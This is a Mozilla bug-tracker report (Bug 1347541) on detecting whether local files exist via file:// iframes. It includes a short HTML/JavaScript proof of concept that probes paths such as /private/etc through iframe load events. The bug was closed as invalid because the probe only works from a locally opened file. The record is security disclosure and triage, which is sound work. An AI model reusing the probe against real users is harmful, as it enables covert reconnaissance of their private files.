Closed
Bug 1347541
Opened 7 years ago
Closed 7 years ago
Detection of arbitrary local files
Categories
(Core :: DOM: Core & HTML, defect)
Tracking
()
RESOLVED
INVALID
People
(Reporter: junorouse, Unassigned)
References
Details
Attachments
(1 file)
619 bytes,
text/html
|
Details |
User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36 Steps to reproduce: I sent you an email. But I can't receive an email. I can detect a local file. But only file:// protocol can. But chrome and many other browsers blocked this way. I am macOs Sierra 10.12.3. POC ------------------------------------ <iframe src="file:///private/etc/" style="display:none" id="d"></iframe> <div id="x"> </div> <script> function go(e) { document.getElementById('check').innerHTML = "no"; var d = document.getElementById('d'); var x = document.getElementById('x'); var c = d.cloneNode(); function file_onLoad() { document.getElementById('check').innerHTML = "exist"; } c.addEventListener('load', file_onLoad, false); c.src="file://" + document.getElementById('ww').value; x.appendChild(c); } </script> <input type='text' value="/private/etc" id='ww' /> <input type='button' value="check" onclick='go(this)'/> <div id="check"> </div> Actual results: Detect all local files existing. https://youtu.be/RWp4sEQE-H4 Expected results: Can detect all local files.
Updated•7 years ago
|
Group: firefox-core-security → dom-core-security
Component: Untriaged → DOM
Product: Firefox → Core
Comment 2•7 years ago
|
||
This does not work when loaded from the web, only if loaded as a local file. There's currently no standard for how local files are treated, everything from "all file:// are same origin" to "each file:// is a separate origin". Chrome does the latter, we're somewhere in the middle.
Group: dom-core-security
Status: UNCONFIRMED → RESOLVED
Closed: 7 years ago
Resolution: --- → INVALID
Assignee | ||
Updated•5 years ago
|
Component: DOM → DOM: Core & HTML
You need to log in
before you can comment on or make changes to this bug.
Description
•